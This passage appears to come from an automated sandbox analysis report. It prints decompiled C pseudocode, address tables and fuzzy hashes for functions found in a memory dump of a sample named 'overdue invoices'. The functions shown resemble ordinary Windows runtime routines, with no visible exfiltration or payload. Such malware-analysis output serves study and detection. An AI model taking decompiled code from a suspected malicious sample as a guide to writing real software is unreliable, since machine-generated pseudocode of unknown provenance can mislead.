									} else {
										L18:
										_t102 = E009C2C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
										L19:
										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
										goto L12;
									}
								}
								L28:
							} else {
								E009AEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
								 *((intOrPtr*)(_t103 - 4)) = 1;
								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
								_t76 = E009C2AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
								__eflags = _t76 - 0xc0000100;
								if(_t76 == 0xc0000100) {
									 *((intOrPtr*)(_t103 - 0x1c)) = E009C2C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
								}
								 *((intOrPtr*)(_t103 - 4)) = _t99;
								E009C2ACB();
							}
						}
					}
					L12:
					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
					_t62 = _t102;
				}
				L13:
				return E009ED0D1(_t62);
				goto L28;
			}





















                  0x009c2990
                  0x009c2992
                  0x009c2997
                  0x009c29a3
                  0x009c29a6
                  0x009c29ab
                  0x009c29ad
                  0x009c29b2
                  0x00a05c80
                  0x009c29b8
                  0x009c29b8
                  0x009c29bb
                  0x009c29c0
                  0x009c29c5
                  0x009c29c6
                  0x009c29c6
                  0x009c29cb
                  0x00000000
                  0x00000000
                  0x009c29cd
                  0x009c29d0
                  0x009c29d9
                  0x009c29db
                  0x009c29dd
                  0x009c2a7f
                  0x009c2a84
                  0x009c2a87
                  0x009c2a89
                  0x00a05ca1
                  0x00a05ca3
                  0x00000000
                  0x009c2a8f
                  0x009c2a8f
                  0x00000000
                  0x009c2a8f
                  0x00000000
                  0x009c29e3
                  0x009c29e3
                  0x009c29e3
                  0x00000000
                  0x009c29e3
                  0x009c29dd
                  0x00000000
                  0x009c29db
                  0x009c29e6
                  0x009c29e9
                  0x009c29eb
                  0x009c29ed
                  0x009c29f3
                  0x009c29f5
                  0x009c29f8
                  0x009c29fa
                  0x009c2a97
                  0x009c2a9a
                  0x009c2a9d
                  0x009c2add
                  0x00000000
                  0x009c2a9f
                  0x009c2aa2
                  0x009c2aa5
                  0x009c2aa8
                  0x009c2aab
                  0x00a05cab
                  0x00a05caf
                  0x00a05cc5
                  0x00a05cda
                  0x00a05cdc
                  0x00a05cdf
                  0x00a05ce5
                  0x00000000
                  0x00a05ceb
                  0x00a05ced
                  0x00a05cee
                  0x00000000
                  0x00a05cee
                  0x00a05cb1
                  0x00a05cb4
                  0x00a05cb9
                  0x00a05cbb
                  0x00000000
                  0x00a05cbd
                  0x00a05cbd
                  0x00000000
                  0x00a05cbd
                  0x00a05cbb
                  0x009c2ab1
                  0x009c2ab1
                  0x009c2ac4
                  0x009c2ac6
                  0x009c2ac6
                  0x00000000
                  0x009c2ac6
                  0x009c2aab
                  0x00000000
                  0x009c2a00
                  0x009c2a09
                  0x009c2a0e
                  0x009c2a21
                  0x009c2a24
                  0x009c2a35
                  0x009c2a3a
                  0x009c2a3d
                  0x009c2a42
                  0x009c2a59
                  0x009c2a59
                  0x009c2a5c
                  0x009c2a5f
                  0x009c2a5f
                  0x009c29fa
                  0x009c29f3
                  0x009c2a64
                  0x009c2a64
                  0x009c2a6b
                  0x009c2a6b
                  0x009c2a6d
                  0x009c2a72
                  0x00000000

                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ab1f53701aa046f115b0b7dc5328b3d0221241e3214d49ad755154a5649ba8ab
                  • Instruction ID: 0036f8673d84d2d0b8640ecd25eaee98715468798ce5e219cf3d4bd566f23999
                  • Opcode Fuzzy Hash: ab1f53701aa046f115b0b7dc5328b3d0221241e3214d49ad755154a5649ba8ab
                  • Instruction Fuzzy Hash: 38514471E00209EFDF25DF55C880E9EBBB5BB48310F148069E815AB2A1C3759D52DF91
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 009C4D3B Relevance: .1, Instructions: 131COMMON
                  Download Yara Rule
                  C-Code - Quality: 78%
                  			E009C4D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				char _v176;
				char _v177;
				char _v184;
				intOrPtr _v192;
				intOrPtr _v196;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t42;
				char* _t44;
				intOrPtr _t46;
				intOrPtr _t50;
				char* _t57;
				intOrPtr _t59;
				intOrPtr _t67;
				signed int _t69;

				_t64 = __edx;
				_v12 =  *0xa8d360 ^ _t69;
				_t65 = 0xa0;
				_v196 = __edx;
				_v177 = 0;
				_t67 = __ecx;
				_v192 = __ecx;
				E009DFA60( &_v176, 0, 0xa0);
				_t57 =  &_v176;
				_t59 = 0xa0;
				if( *0xa87bc8 != 0) {
					L3:
					while(1) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t67 = _v192;
						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
						_push( &_v184);
						_push(_t59);
						_push(_t57);
						_push(0xa0);
						_push(_t57);
						_push(0xf);
						_t42 = E009DB0B0();
						if(_t42 != 0xc0000023) {
							break;
						}
						if(_v177 != 0) {
							L009B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
						}
						_v177 = 1;
						_t44 = L009B4620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
						_t59 = _v184;
						_t57 = _t44;
						if(_t57 != 0) {
							continue;
						} else {
							_t42 = 0xc0000017;
							break;
						}
					}
					if(_t42 != 0) {
						_t65 = E0099CCC0(_t42);
						if(_t65 != 0) {
							L10:
							if(_v177 != 0) {
								if(_t57 != 0) {
									L009B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
								}
							}
							_t46 = _t65;
							L12:
							return L009DB640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
						}
						L7:
						_t50 = _a4;
						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
						if(_t50 != 3) {
							if(_t50 == 2) {
								goto L8;
							}
							L9:
							if(E009DF380(_t67 + 0xc, 0x975138, 0x10) == 0) {
								 *0xa860d8 = _t67;
							}
							goto L10;
						}
						L8:
						_t64 = _t57 + 0x28;
						L009C4F49(_t67, _t57 + 0x28);
						goto L9;
					}
					_t65 = 0;
					goto L7;
				}
				if(L009C4E70(0xa886b0, 0x9c5690, 0, 0) != 0) {
					_t46 = E0099CCC0(_t56);
					goto L12;
				} else {
					_t59 = 0xa0;
					goto L3;
				}
			}




















                  0x009c4d3b
                  0x009c4d4d
                  0x009c4d53
                  0x009c4d58
                  0x009c4d65
                  0x009c4d6c
                  0x009c4d71
                  0x009c4d77
                  0x009c4d7f
                  0x009c4d8c
                  0x009c4d8e
                  0x009c4dad
                  0x009c4db0
                  0x009c4db7
                  0x009c4db8
                  0x009c4db9
                  0x009c4dba
                  0x009c4dbb
                  0x009c4dc1
                  0x009c4dc8
                  0x009c4dcc
                  0x009c4dd5
                  0x009c4dde
                  0x009c4ddf
                  0x009c4de0
                  0x009c4de1
                  0x009c4de6
                  0x009c4de7
                  0x009c4de9
                  0x009c4df3
                  0x00000000
                  0x00000000
                  0x00a06c7c
                  0x00a06c8a
                  0x00a06c8a
                  0x00a06c9d
                  0x00a06ca7
                  0x00a06cac
                  0x00a06cb2
                  0x00a06cb9
                  0x00000000
                  0x00a06cbf
                  0x00a06cbf
                  0x00000000
                  0x00a06cbf
                  0x00a06cb9
                  0x009c4dfb
                  0x00a06ccf
                  0x00a06cd3
                  0x009c4e32
                  0x009c4e39
                  0x00a06ce0
                  0x00a06cf2
                  0x00a06cf2
                  0x00a06ce0
                  0x009c4e3f
                  0x009c4e41
                  0x009c4e51
                  0x009c4e51
                  0x009c4e03
                  0x009c4e03
                  0x009c4e09
                  0x009c4e0f
                  0x009c4e57
                  0x00000000
                  0x00000000
                  0x009c4e1b
                  0x009c4e30
                  0x009c4e5b
                  0x009c4e5b
                  0x00000000
                  0x009c4e30
                  0x009c4e11
                  0x009c4e11
                  0x009c4e16
                  0x00000000
                  0x009c4e16
                  0x009c4e01
                  0x00000000
                  0x009c4e01
                  0x009c4da5
                  0x00a06c6b
                  0x00000000
                  0x009c4dab
                  0x009c4dab
                  0x00000000
                  0x009c4dab

                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 7bb09153674844556149fc1a5962bfe58d3ef470854e099cb2396b52617acbef
                  • Instruction ID: f68deadc178173cdffbd6b033068025444e6267d15c2ac96bb44f22897207eb0
                  • Opcode Fuzzy Hash: 7bb09153674844556149fc1a5962bfe58d3ef470854e099cb2396b52617acbef
                  • Instruction Fuzzy Hash: 5C41C271B403189FEB21DF14CC91FAAB7A9FB84714F0544AEE8499B281DB74ED40CB92
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 009C4BAD Relevance: .1, Instructions: 131COMMON
                  Download Yara Rule
                  C-Code - Quality: 85%
                  			E009C4BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
				signed int _v8;
				short _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				char _v156;
				short _v158;
				intOrPtr _v160;
				char _v164;
				intOrPtr _v168;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t45;
				intOrPtr _t74;
				signed char _t77;
				short _t84;
				char* _t85;
				void* _t86;
				intOrPtr _t87;
				signed short _t88;
				signed int _t89;

				_t83 = __edx;
				_v8 =  *0xa8d360 ^ _t89;
				_t45 = _a8 & 0x0000ffff;
				_v158 = __edx;
				_v168 = __ecx;
				if(_t45 == 0) {
					L22:
					_t86 = 6;
					L12:
					E0099CC50(_t86);
					L11:
					return L009DB640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
				}
				_t77 = _a4;
				if((_t77 & 0x00000001) != 0) {
					goto L22;
				}
				_t8 = _t77 + 0x34; // 0xdce0ba00
				if(_t45 !=  *_t8) {
					goto L22;
				}
				_t9 = _t77 + 0x24; // 0xa88504
				E009B2280(_t9, _t9);
				_t87 = 0x78;
				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
				E009DFA60( &_v156, 0, _t87);
				_t13 = _t77 + 0x30; // 0x3db8
				_t85 =  &_v156;
				_v36 =  *_t13;
				_v28 = _v168;
				_v32 = 0;
				_v24 = 0;
				_v20 = _v158;
				_v160 = 0;
				while(1) {
					_push( &_v164);
					_push(_t87);
					_push(_t85);
					_push(0x18);
					_push( &_v36);
					_push(0x1e);
					_t88 = E009DB0B0();
					if(_t88 != 0xc0000023) {
						break;
					}
					if(_t85 !=  &_v156) {
						L009B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
					}
					_t84 = L009B4620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
					_v168 = _v164;
					if(_t84 == 0) {
						_t88 = 0xc0000017;
						goto L19;
					} else {
						_t74 = _v160 + 1;
						_v160 = _t74;
						if(_t74 >= 0x10) {
							L19:
							_t86 = E0099CCC0(_t88);
							if(_t86 != 0) {
								L8:
								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
								_t30 = _t77 + 0x24; // 0xa88504
								L009AFFB0(_t77, _t84, _t30);
								if(_t84 != 0 && _t84 !=  &_v156) {
									L009B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
								}
								if(_t86 != 0) {
									goto L12;
								} else {
									goto L11;
								}
							}
							L6:
							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
							if(_v164 != 0) {
								_t83 = _t84;
								L009C4F49(_t77, _t84);
							}
							goto L8;
						}
						_t87 = _v168;
						continue;
					}
				}
				if(_t88 != 0) {
					goto L19;
				}
				goto L6;
			}


























                  0x009c4bad
                  0x009c4bbf
                  0x009c4bc2
                  0x009c4bc6
                  0x009c4bcd
                  0x009c4bd9
                  0x00a067fe
                  0x00a06800
                  0x009c4ccc
                  0x009c4ccd
                  0x009c4cb7
                  0x009c4cc9
                  0x009c4cc9
                  0x009c4bdf
                  0x009c4be5
                  0x00000000
                  0x00000000
                  0x009c4beb
                  0x009c4bef
                  0x00000000
                  0x00000000
                  0x009c4bf5
                  0x009c4bf9
                  0x009c4c06
                  0x009c4c0b
                  0x009c4c17
                  0x009c4c1c
                  0x009c4c1f
                  0x009c4c25
                  0x009c4c33
                  0x009c4c3d
                  0x009c4c40
                  0x009c4c43
                  0x009c4c47
                  0x009c4c4d
                  0x009c4c53
                  0x009c4c54
                  0x009c4c55
                  0x009c4c56
                  0x009c4c5b
                  0x009c4c5c
                  0x009c4c63
                  0x009c4c6b
                  0x00000000
                  0x00000000
                  0x00a06776
                  0x00a06784
                  0x00a06784
                  0x00a0679f
                  0x00a067a7
                  0x00a067af
                  0x00a067ce
                  0x00000000
                  0x00a067b1
                  0x00a067b7
                  0x00a067b8
                  0x00a067c1
                  0x00a067d3
                  0x00a067d9
                  0x00a067dd
                  0x009c4c94
                  0x009c4c94
                  0x009c4c98
                  0x009c4c9c
                  0x009c4ca3
                  0x00a067f4
                  0x00a067f4
                  0x009c4cb5
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x009c4cb5
                  0x009c4c79
                  0x009c4c7e
                  0x009c4c89
                  0x009c4c8b
                  0x009c4c8f
                  0x009c4c8f
                  0x00000000
                  0x009c4c89
                  0x00a067c3
                  0x00000000
                  0x00a067c3
                  0x00a067af
                  0x009c4c73
                  0x00000000
                  0x00000000
                  0x00000000

                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a012c5298f8d493f47bce9a1e3b83529dfb189042cfe9931085e2c195d63fe85
                  • Instruction ID: 6d28be7539c7bf292fddfa1d77e0ea8371d920909bb55126bf10425ecca457a6
                  • Opcode Fuzzy Hash: a012c5298f8d493f47bce9a1e3b83529dfb189042cfe9931085e2c195d63fe85
                  • Instruction Fuzzy Hash: 1241C435E4122C9BCB20DF68C941FEA77B8EF45710F0144A9E948AB291DB34DE80CB91
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 009A8A0A Relevance: .1, Instructions: 120COMMON
                  Download Yara Rule
                  C-Code - Quality: 94%
                  			E009A8A0A(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				char _v524;
				signed int _v528;
				void* _v532;
				char _v536;
				char _v540;
				char _v544;
				intOrPtr* _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t44;
				void* _t46;
				void* _t48;
				signed int _t53;
				signed int _t55;
				intOrPtr* _t62;
				void* _t63;
				unsigned int _t75;
				signed int _t79;
				unsigned int _t81;
				unsigned int _t83;
				signed int _t84;
				void* _t87;

				_t76 = __edx;
				_v8 =  *0xa8d360 ^ _t84;
				_v536 = 0x200;
				_t79 = 0;
				_v548 = __edx;
				_v544 = 0;
				_t62 = __ecx;
				_v540 = 0;
				_v532 =  &_v524;
				if(__edx == 0 || __ecx == 0) {
					L6:
					return L009DB640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
				} else {
					_v528 = 0;
					E009AE9C0(1, __ecx, 0, 0,  &_v528);
					_t44 = _v528;
					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
					_t46 = 0xa;
					_t87 = _t81 - _t46;
					if(_t87 > 0 || _t87 == 0) {
						 *_v548 = 0x971180;
						L5:
						_t79 = 1;
						goto L6;
					} else {
						_t48 = E009C1DB5(_t62,  &_v532,  &_v536);
						_t76 = _v528;
						if(_t48 == 0) {
							L9:
							E009D3C2A(_t81, _t76,  &_v544);
							 *_v548 = _v544;
							goto L5;
						}
						_t62 = _v532;
						if(_t62 != 0) {
							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
							_t53 =  *_t62;
							_v528 = _t53;
							if(_t53 != 0) {
								_t63 = _t62 + 4;
								_t55 = _v528;
								do {
									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
										if(E009A8999(_t63,  &_v540) == 0) {
											_t55 = _v528;
										} else {
											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
											_t55 = _v528;
											if(_t75 >= _t83) {
												_t83 = _t75;
											}
										}
									}
									_t63 = _t63 + 0x14;
									_t55 = _t55 - 1;
									_v528 = _t55;
								} while (_t55 != 0);
								_t62 = _v532;
							}
							if(_t62 !=  &_v524) {
								L009B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
							}
							_t76 = _t83 & 0x0000ffff;
							_t81 = _t83 >> 0x10;
						}
						goto L9;
					}
				}
			}



























                  0x009a8a0a
                  0x009a8a1c
                  0x009a8a23
                  0x009a8a2e
                  0x009a8a30
                  0x009a8a36
                  0x009a8a3c
                  0x009a8a3e
                  0x009a8a4a
                  0x009a8a52
                  0x009a8a9c
                  0x009a8aae
                  0x009a8a58
                  0x009a8a5e
                  0x009a8a6a
                  0x009a8a6f
                  0x009a8a75
                  0x009a8a7d
                  0x009a8a85
                  0x009a8a86
                  0x009a8a89
                  0x009a8a93
                  0x009a8a99
                  0x009a8a9b
                  0x00000000
                  0x009a8aaf
                  0x009a8abe
                  0x009a8ac3
                  0x009a8acb
                  0x009a8ad7
                  0x009a8ae0
                  0x009a8af1
                  0x00000000
                  0x009a8af1
                  0x009a8acd
                  0x009a8ad5
                  0x009a8afb
                  0x009a8afd
                  0x009a8aff
                  0x009a8b07
                  0x009a8b22
                  0x009a8b24
                  0x009a8b2a
                  0x009a8b2e
                  0x009a8b3f
                  0x009a8b78
                  0x009a8b41
                  0x009a8b52
                  0x009a8b54
                  0x009a8b5c
                  0x009a8b74
                  0x009a8b74
                  0x009a8b5c
                  0x009a8b3f
                  0x009a8b5e
                  0x009a8b61
                  0x009a8b64
                  0x009a8b64
                  0x009a8b6c
                  0x009a8b6c
                  0x009a8b11
                  0x009f9cd5
                  0x009f9cd5
                  0x009a8b17
                  0x009a8b1a
                  0x009a8b1a
                  0x00000000
                  0x009a8ad5
                  0x009a8a89

                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: fa4c95e53998e2e316a82a5edcaa8bb1818791a5cf6f7a2cdf58475d09db81b5
                  • Instruction ID: a19ca7311bac9264e4443a8685c82f54aebfe9a618d78389a07fe817738baa6a
                  • Opcode Fuzzy Hash: fa4c95e53998e2e316a82a5edcaa8bb1818791a5cf6f7a2cdf58475d09db81b5
                  • Instruction Fuzzy Hash: ED4177B1A4032C9BDB24DF55CC88BAAB7F8FB95300F1045EAD81997251DB749E80CFA0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00A169A6 Relevance: .1, Instructions: 108COMMON
                  Download Yara Rule
                  C-Code - Quality: 69%
                  			E00A169A6(signed short* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				char* _v44;
				signed int _v48;
				intOrPtr _v52;
				signed int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				char _v72;
				signed short* _v76;
				signed int _v80;
				char _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t68;
				intOrPtr _t73;
				signed short* _t74;
				void* _t77;
				void* _t78;
				signed int _t79;
				signed int _t80;

				_v8 =  *0xa8d360 ^ _t80;
				_t75 = 0x100;
				_v64 = _v64 & 0x00000000;
				_v76 = __ecx;
				_t79 = 0;
				_t68 = 0;
				_v72 = 1;
				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
				_t77 = 0;
				if(L009A6C59(__ecx[2], 0x100, __eflags) != 0) {
					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
					if(_t79 != 0 && E00A16BA3() != 0) {
						_push(0);
						_push(0);
						_push(0);
						_push(0x1f0003);
						_push( &_v64);
						if(E009D9980() >= 0) {
							E009B2280(_t56, 0xa88778);
							_t77 = 1;
							_t68 = 1;
							if( *0xa88774 == 0) {
								asm("cdq");
								 *(_t79 + 0xf70) = _v64;
								 *(_t79 + 0xf74) = 0x100;
								_t75 = 0;
								_t73 = 4;
								_v60 =  &_v68;
								_v52 = _t73;
								_v36 = _t73;
								_t74 = _v76;
								_v44 =  &_v72;
								 *0xa88774 = 1;
								_v56 = 0;
								_v28 = _t74[2];
								_v48 = 0;
								_v20 = ( *_t74 & 0x0000ffff) + 2;
								_v40 = 0;
								_v32 = 0;
								_v24 = 0;
								_v16 = 0;
								if(E0099B6F0(0x97c338, 0x97c288, 3,  &_v60) == 0) {
									_v80 = _v80 | 0xffffffff;
									_push( &_v84);
									_push(0);
									_push(_v64);
									_v84 = 0xfa0a1f00;
									E009D9520();
								}
							}
						}
					}
				}
				if(_v64 != 0) {
					_push(_v64);
					E009D95D0();
					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
				}
				if(_t77 != 0) {
					L009AFFB0(_t68, _t77, 0xa88778);
				}
				_pop(_t78);
				return L009DB640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
			}
































                  0x00a169b5
                  0x00a169be
                  0x00a169c3
                  0x00a169c9
                  0x00a169cc
                  0x00a169d1
                  0x00a169d3
                  0x00a169de
                  0x00a169e1
                  0x00a169ea
                  0x00a169f6
                  0x00a169fe
                  0x00a16a13
                  0x00a16a14
                  0x00a16a15
                  0x00a16a16
                  0x00a16a1e
                  0x00a16a26
                  0x00a16a31
                  0x00a16a36
                  0x00a16a37
                  0x00a16a40
                  0x00a16a49
                  0x00a16a4a
                  0x00a16a53
                  0x00a16a59
                  0x00a16a5d
                  0x00a16a5e
                  0x00a16a64
                  0x00a16a67
                  0x00a16a6a
                  0x00a16a6d
                  0x00a16a70
                  0x00a16a77
                  0x00a16a7d
                  0x00a16a86
                  0x00a16a89
                  0x00a16a9c
                  0x00a16a9f
                  0x00a16aa2
                  0x00a16aa5
                  0x00a16aaf
                  0x00a16ab1
                  0x00a16ab8
                  0x00a16ab9
                  0x00a16abb
                  0x00a16abe
                  0x00a16ac5
                  0x00a16ac5
                  0x00a16aaf
                  0x00a16a40
                  0x00a16a26
                  0x00a169fe
                  0x00a16ace
                  0x00a16ad0
                  0x00a16ad3
                  0x00a16ad8
                  0x00a16adf
                  0x00a16adf
                  0x00a16ae8
                  0x00a16aef
                  0x00a16aef
                  0x00a16af9
                  0x00a16b06

                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8f4ae1705911f1218bd60b3f254b8e5d9560b059361167d9da79037a02fd137a
                  • Instruction ID: 829d6a878c2e103571b26002f9983fa3f3f3dbdc6a17b16f8bf7c0a37d29ed8e
                  • Opcode Fuzzy Hash: 8f4ae1705911f1218bd60b3f254b8e5d9560b059361167d9da79037a02fd137a
                  • Instruction Fuzzy Hash: 7941A9B1D40208AFDB24DFA8D941BFEBBF8EF88714F14812AE814E7251DB749945CB50
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00995210 Relevance: .1, Instructions: 107COMMON
                  Download Yara Rule
                  C-Code - Quality: 85%
                  			E00995210(intOrPtr _a4, void* _a8) {
				void* __ecx;
				intOrPtr _t31;
				signed int _t32;
				signed int _t33;
				intOrPtr _t35;
				signed int _t52;
				void* _t54;
				void* _t56;
				unsigned int _t59;
				signed int _t60;
				void* _t61;

				_t61 = E009952A5(1);
				if(_t61 == 0) {
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					_t54 =  *((intOrPtr*)(_t31 + 0x28));
					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
				} else {
					_t54 =  *((intOrPtr*)(_t61 + 0x10));
					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
				}
				_t60 = _t59 >> 1;
				_t32 = 0x3a;
				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
					_t52 = _t60 + _t60;
					if(_a4 > _t52) {
						goto L5;
					}
					if(_t61 != 0) {
						asm("lock xadd [esi], eax");
						if((_t32 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E009D95D0();
							L009B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					} else {
						E009AEB70(_t54, 0xa879a0);
					}
					_t26 = _t52 + 2; // 0xddeeddf0
					return _t26;
				} else {
					_t52 = _t60 + _t60;
					if(_a4 < _t52) {
						if(_t61 != 0) {
							asm("lock xadd [esi], eax");
							if((_t32 | 0xffffffff) == 0) {
								_push( *((intOrPtr*)(_t61 + 4)));
								E009D95D0();
								L009B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
							}
						} else {
							E009AEB70(_t54, 0xa879a0);
						}
						return _t52;
					}
					L5:
					_t33 = E009DF3E0(_a8, _t54, _t52);
					if(_t61 == 0) {
						E009AEB70(_t54, 0xa879a0);
					} else {
						asm("lock xadd [esi], eax");
						if((_t33 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E009D95D0();
							L009B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					}
					_t35 = _a8;
					if(_t60 <= 1) {
						L9:
						_t60 = _t60 - 1;
						 *((short*)(_t52 + _t35 - 2)) = 0;
						goto L10;
					} else {
						_t56 = 0x3a;
						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
							 *((short*)(_t52 + _t35)) = 0;
							L10:
							return _t60 + _t60;
						}
						goto L9;
					}
				}
			}














                  0x00995220
                  0x00995224
                  0x009f0d13
                  0x009f0d16
                  0x009f0d19
                  0x0099522a
                  0x0099522a
                  0x0099522d
                  0x0099522d
                  0x00995231
                  0x00995235
                  0x00995239
                  0x009f0d5c
                  0x009f0d62
                  0x00000000
                  0x00000000
                  0x009f0d6a
                  0x009f0d7b
                  0x009f0d7f
                  0x009f0d81
                  0x009f0d84
                  0x009f0d95
                  0x009f0d95
                  0x009f0d6c
                  0x009f0d71
                  0x009f0d71
                  0x009f0d9a
                  0x00000000
                  0x0099524a
                  0x0099524a
                  0x00995250
                  0x009f0d24
                  0x009f0d35
                  0x009f0d39
                  0x009f0d3b
                  0x009f0d3e
                  0x009f0d50
                  0x009f0d50
                  0x009f0d26
                  0x009f0d2b
                  0x009f0d2b
                  0x00000000
                  0x009f0d55
                  0x00995256
                  0x0099525b
                  0x00995265
                  0x009f0da7
                  0x0099526b
                  0x0099526e
                  0x00995272
                  0x009f0db1
                  0x009f0db4
                  0x009f0dc5
                  0x009f0dc5
                  0x00995272
                  0x00995278
                  0x0099527e
                  0x0099528a
                  0x0099528c
                  0x0099528d
                  0x00000000
                  0x00995280
                  0x00995282
                  0x00995288
                  0x0099529f
                  0x00995292
                  0x00000000
                  0x00995292
                  0x00000000
                  0x00995288
                  0x0099527e

                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c0f00b2ce12425c5b81cf21b526a1ce214f2d3d5cddbaecd602ea66206bbe803
                  • Instruction ID: 6b9a5bd0e6a8ab6686a4b4b5fb6443da461b143074312d595b7fb647d056d6ab
                  • Opcode Fuzzy Hash: c0f00b2ce12425c5b81cf21b526a1ce214f2d3d5cddbaecd602ea66206bbe803
